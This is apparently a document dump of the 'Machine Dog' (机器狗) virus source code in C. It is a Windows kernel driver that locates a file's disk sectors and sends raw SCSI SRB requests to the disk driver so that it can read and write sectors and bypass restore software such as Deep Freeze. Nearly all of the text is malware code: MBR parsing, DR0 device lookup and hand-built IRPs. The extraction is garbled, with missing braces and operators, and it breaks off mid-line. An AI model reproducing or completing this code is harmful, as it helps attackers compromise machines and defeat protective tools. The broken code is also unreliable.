
机器狗病毒源码1C语言.docx

1、机器狗病毒源码1C语言/备注:获取文件在扇区的位置后,向磁盘驱动发送srb命令读写扇区,来穿透冰点等还原软件。/编译时注意:FileSystemControl的数据结构需要自己添加。#include#include#define FSCTL_GET_RETRIEVAL_POINTERS 0x90073#define PARTITION_TYPE_NTFS 0x07#define PARTITION_TYPE_FAT32 0x0B#define PARTITION_TYPE_FAT32_LBA 0x0Cextern POBJECT_TYPE* IoDriverObjectType;LARGE_I

2、NTEGER realdiskpos;ULONG sectorspercluster;typedef struct RETRIEVAL_POINTERS_BUFFER ULONG ExtentCount; LARGE_INTEGER StartingVcn; struct LARGE_INTEGER NextVcn; LARGE_INTEGER Lcn; Extents1; RETRIEVAL_POINTERS_BUFFER, *PRETRIEVAL_POINTERS_BUFFER;typedef struct LARGE_INTEGER StartingVcn; STARTING_VCN_I

3、NPUT_BUFFER, *PSTARTING_VCN_INPUT_BUFFER;typedef struct _SENSE_DATA unsigned char Valid; unsigned char SegmentNumber; unsigned char FileMark; unsigned char Information4; unsigned char AdditionalSenseLength; unsigned char CommandSpecificInformation4; unsigned char AdditionalSenseCode; unsigned char A

4、dditionalSenseCodeQualifier; unsigned char FieldReplaceableUnitCode; unsigned char SenseKeySpecific3; SENSE_DATA, *PSENSE_DATA;#pragma pack(1)typedef struct _PARTITION_ENTRY UCHAR active; UCHAR StartHead; UCHAR StartSector; UCHAR StartCylinder; UCHAR PartitionType; UCHAR EndHead; UCHAR EndSector; UC

5、HAR EndCylinder; ULONG StartLBA; ULONG TotalSector; PARTITION_ENTRY, *PPARTITION_ENTRY;typedef struct _MBR_SECTOR UCHAR BootCode446; PARTITION_ENTRY Partition4; USHORT Signature; MBR_SECTOR, *PMBR_SECTOR;typedef struct _BBR_SECTOR USHORT JmpCode; UCHAR NopCode; UCHAR OEMName8; USHORT BytesPerSector;

6、 UCHAR SectorsPerCluster; USHORT ReservedSectors; UCHAR NumberOfFATs; USHORT RootEntries; USHORT NumberOfSectors16; UCHAR MediaDescriptor; USHORT SectorsPerFAT16; USHORT SectorsPerTrack; USHORT HeadsPerCylinder; ULONG HiddenSectors; ULONG NumberOfSectors32; ULONG SectorsPerFAT32; BBR_SECTOR, *PBBR_S

7、ECTOR;#pragma pack()typedef struct _SYSTEM_MODULE_INFORMATION ULONG Reserved2;PVOID Base;ULONG Size;ULONG Flags;USHORT Index;USHORT Unknown;USHORT LoadCount;USHORT ModuleNameOffset; CHAR ImageName255; SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;NTSYSAPINTSTATUSNTAPIObReferenceObjectByName

8、(IN PUNICODE_STRING ObjectName,IN ULONG Attributes,IN PACCESS_STATE AccessState OPTIONAL,IN ACCESS_MASK DesiredAccess OPTIONAL,IN POBJECT_TYPE ObjectType,IN KPROCESSOR_MODE AccessMode,IN OUT PVOID ParseContext OPTIONAL,OUT PVOID* Object );NTSYSAPINTSTATUSNTAPIZwQuerySystemInformation( IN ULONG Syste

9、mInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength);NTSTATUS IrpCompletionRoutine( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context ) PMDL mdl; Irp-UserIosb-Status=Irp-IoStatus.Status; Irp-UserIosb-Information=Irp-IoStatus.Inform

10、ation; if(! Context) mdl=Irp-MdlAddress; if(mdl) DbgPrint(read size: %d., Irp-IoStatus.Information); MmUnlockPages(mdl); IoFreeMdl(mdl); KeSetEvent(Irp-UserEvent, IO_NO_INCREMENT, 0); IoFreeIrp(Irp);return STATUS_MORE_PROCESSING_REQUIRED;NTSTATUS IrpCompletionRoutine_0( IN PDEVICE_OBJECT DeviceObjec

11、t, IN PIRP Irp, IN PVOID Context ) PMDL mdl; Irp-UserIosb-Status=Irp-IoStatus.Status; Irp-UserIosb-Information=Irp-IoStatus.Information; if (! Context ) mdl=Irp-MdlAddress; if ( mdl ) DbgPrint(read size: %d., Irp-IoStatus.Information); MmUnlockPages(mdl); IoFreeMdl(mdl); KeSetEvent(Irp-UserEvent, IO

12、_NO_INCREMENT, 0); IoFreeIrp(Irp); return STATUS_MORE_PROCESSING_REQUIRED;ULONG GetModuleBase(char* name) ULONG n,i ; PSYSTEM_MODULE_INFORMATION module; PVOID pbuftmp; char modulename255; ZwQuerySystemInformation(11, &n, 0, &n); pbuftmp = ExAllocatePool(NonPagedPool, n); ZwQuerySystemInformation(11,

13、 pbuftmp, n, NULL);module = (PSYSTEM_MODULE_INFORMATION)(PULONG )pbuftmp + 1 );n = *(PULONG)pbuftmp ); for ( i = 0; i CurrentLocation; stack = IoGetNextIrpStackLocation( Irp ); Irp-Tail.Overlay.CurrentStackLocation= stack;/移动堆栈 stack-DeviceObject=DeviceObject; return (DeviceObject-DriverObject-Major

14、Function(ULONG)stack-MajorFunction)(DeviceObject, Irp);ULONG AtapiReadWriteDisk(PDEVICE_OBJECT dev_object,ULONG MajorFunction, PVOID buffer,ULONG DiskPos, int BlockCount) NTSTATUS status; PSCSI_REQUEST_BLOCK srb; PSENSE_DATA sense; KEVENT Event; PIRP irp; PMDL mdl; IO_STATUS_BLOCK isb; PIO_STACK_LOC

15、ATION isl; PVOID psense; int count=8; while(1) srb=ExAllocatePool(0,sizeof(SCSI_REQUEST_BLOCK); if(!srb) break; sense=ExAllocatePool(0,sizeof(SENSE_DATA); psense=sense; if(!sense) break; memset(srb,0,sizeof(SCSI_REQUEST_BLOCK); memset(sense,0,sizeof(SENSE_DATA); srb-Length=sizeof(SCSI_REQUEST_BLOCK)

16、;/更多关于srb,请看SCSI 总线和IDE接口:协议、应用和编程和SCSI程序员指南 srb-Function=0; srb-DataBuffer=buffer; srb-DataTransferLength=BlockCountQueueAction=SRB_FLAGS_DISABLE_AUTOSENSE; srb-SrbStatus=0; srb-ScsiStatus=0; srb-NextSrb=0; srb-SenseInfoBuffer=sense; srb-SenseInfoBufferLength=sizeof(SENSE_DATA); if(MajorFunction=IR

17、P_MJ_READ) srb-SrbFlags=SRB_FLAGS_DATA_IN; else srb-SrbFlags=SRB_FLAGS_DATA_OUT; if(MajorFunction=IRP_MJ_READ) srb-SrbFlags|=SRB_FLAGS_ADAPTER_CACHE_ENABLE; srb-SrbFlags|=SRB_FLAGS_DISABLE_AUTOSENSE; srb-TimeOutValue=(srb-DataTransferLength10)+1; srb-QueueSortKey=DiskPos; srb-CdbLength=10; srb-Cdb0=

18、2*(UCHAR)MajorFunction+ 17); srb-Cdb1=srb-Cdb1 & 0x1F | 0x80; srb-Cdb2=(unsigned char)(DiskPos0x18)&0xFF; / srb-Cdb3=(unsigned char)(DiskPos0x10)&0xFF; / srb-Cdb4=(unsigned char)(DiskPos0x08)&0xFF; / srb-Cdb5=(UCHAR)DiskPos; /填写sector位置 srb-Cdb7=(UCHAR)BlockCount0x08; srb-Cdb8=(UCHAR)BlockCount; /By

19、:Eros412 KeInitializeEvent(&Event, 0, 0); irp=IoAllocateIrp(dev_object-StackSize,0); mdl=IoAllocateMdl(buffer, BlockCountMdlAddress=mdl; if(!mdl) ExFreePool(srb); ExFreePool(psense); IoFreeIrp(irp); return STATUS_INSUFFICIENT_RESOURCES; MmProbeAndLockPages(mdl,0,(MajorFunction=IRP_MJ_READ?0:1); srb-

20、OriginalRequest=irp; irp-UserIosb=&isb; irp-UserEvent=&Event; irp-IoStatus.Status=0; irp-IoStatus.Information=0; irp-Flags=IRP_SYNCHRONOUS_API|IRP_NOCACHE; irp-AssociatedIrp.SystemBuffer=0; irp-Cancel=0; irp-RequestorMode=0; irp-CancelRoutine=0; irp-Tail.Overlay.Thread=PsGetCurrentThread(); isl=IoGe

21、tNextIrpStackLocation(irp); isl-DeviceObject=dev_object; isl-MajorFunction=IRP_MJ_SCSI; isl-Parameters.Scsi.Srb=srb; isl-CompletionRoutine=IrpCompletionRoutine_0; isl-Context=srb; isl-Control=SL_INVOKE_ON_CANCEL|SL_INVOKE_ON_SUCCESS|SL_INVOKE_ON_ERROR; status=MyIoCallDriver(dev_object,irp); KeWaitFo

22、rSingleObject(&Event, 0, 0, 0, 0); if(srb-SenseInfoBuffer!=psense&srb-SenseInfoBuffer) ExFreePool(srb-SenseInfoBuffer); ExFreePool(srb); ExFreePool(psense); if ( status = 0 | !count ) return status; DbgPrint(Send XXX Failed.%08xrn, status); KeStallExecutionProcessor(1u); -count; return STATUS_INSUFF

23、ICIENT_RESOURCES;PDEVICE_OBJECT GetLastDiskDeviceObject(PDRIVER_OBJECT drv_object)/这个就是DR0 PDEVICE_OBJECT result; PDEVICE_OBJECT finddev; finddev=drv_object-DeviceObject; result=NULL; while (finddev) if (finddev-DeviceType=FILE_DEVICE_DISK) result = finddev; finddev=finddev-NextDevice; return result

24、;PDEVICE_OBJECT GetAtaDr0DevObject()UNICODE_STRING diskstr;PDRIVER_OBJECT diskdrv;PDEVICE_OBJECT dr0dev; RtlInitUnicodeString(&diskstr, LDriverDisk); if(ObReferenceObjectByName(&diskstr,64,0,0,*IoDriverObjectType,0,0,&diskdrv)Vpb; result=vpb-DeviceObject; if(!vpb|!result) if(!Object-DeviceObject-Vpb

25、|!Object-DeviceObject-Vpb-DeviceObject) result=Object-DeviceObject; return result;PLARGE_INTEGER GetPosAndCluster()/得到第一个分区文件数据的起始位置 PVOID buffer; ULONG type,startlba; int i; PLARGE_INTEGER result; PDEVICE_OBJECT dev; PMBR_SECTOR mbrsec; PPARTITION_ENTRY partition0; PBBR_SECTOR bootsec; result=ExAll

26、ocatePool(0,sizeof(LARGE_INTEGER); dev=GetAtaDr0DevObject(); if(dev) buffer=ExAllocatePool(0,512); memset(buffer,0,512); if(AtapiReadWriteDisk(dev, IRP_MJ_READ, buffer, 0, 1)0) DbgPrint(AtapiReadWriteDisk ok); mbrsec=(PMBR_SECTOR)buffer; partition0=&mbrsec-Partition0; startlba=partition00.StartLBA;

27、type=partition00.PartitionType; DbgPrint(dwPartOnePos:0x%08x.1, startlba); result-QuadPart=startlba; memset(buffer,0,512); if(AtapiReadWriteDisk(dev, IRP_MJ_READ, buffer, startlba, 1)0) bootsec=(PBBR_SECTOR)buffer; DbgPrint(gSectorsPerCluster:%d., bootsec-SectorsPerCluster); sectorspercluster=bootsec-SectorsPerCluster; result-QuadPart+=bootsec-ReservedSectors; DbgPrint(dwPartOnePos:%I64x.2rn, result-QuadPart); if(type=PARTITION_TYPE_FAT32|type=PARTITION_TYPE_FAT32_LBA) result-QuadPart+=bootsec-NumberOfFATs*bootsec-SectorsPerFA
